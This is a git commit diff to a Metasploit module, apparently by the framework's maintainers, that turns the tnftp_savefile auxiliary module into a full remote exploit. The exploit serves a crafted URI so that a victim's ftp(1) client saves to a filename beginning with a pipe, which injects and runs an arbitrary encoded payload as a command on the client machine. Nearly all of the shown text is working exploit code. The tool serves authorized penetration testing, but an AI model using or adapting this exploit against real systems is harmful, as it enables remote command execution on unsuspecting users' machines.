Land rapid7#9160, tnftp_savefile auxiliary to exploit

wvu · wvu · commit 57fde9d8ca61 · 2017-11-01T18:48:07.000-05:00
diff --git a/modules/exploits/unix/http/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb
@@ -3,7 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-class MetasploitModule < Msf::Auxiliary
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
   include Msf::Exploit::Remote::HttpServer
   include Msf::Auxiliary::Report
 
@@ -32,22 +34,18 @@ def initialize(info = {})
       ],
       'DisclosureDate' => 'Oct 28 2014',
       'License' => MSF_LICENSE,
-      'Actions' => [
-        ['Service']
-      ],
-      'PassiveActions' => [
-        'Service'
-      ],
-      'DefaultAction' => 'Service'
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'Privileged' => false,
+      'Payload' => {'BadChars' => '/'},
+      'Targets' => [['ftp(1)', {}]],
+      'DefaultTarget' => 0
     ))
-
-    register_options([
-      OptString.new('CMD', [true, 'Command to run', 'uname -a'])
-    ])
   end
 
-  def run
-    exploit
+  def exploit
+    start_service
+    sleep
   end
 
   def on_request_uri(cli, request)
@@ -59,7 +57,7 @@ def on_request_uri(cli, request)
 
     if request.uri.ends_with?(sploit)
       send_response(cli, '')
-      print_good("Executing `#{datastore['CMD']}'!")
+      print_good("Executing `#{payload.encoded}'!")
       report_vuln(
         :host => cli.peerhost,
         :name => self.name,
@@ -79,6 +77,6 @@ def sploit_uri
   end
 
   def sploit
-    "|#{datastore['CMD']}"
+    "|#{payload.encoded}"
   end
 end
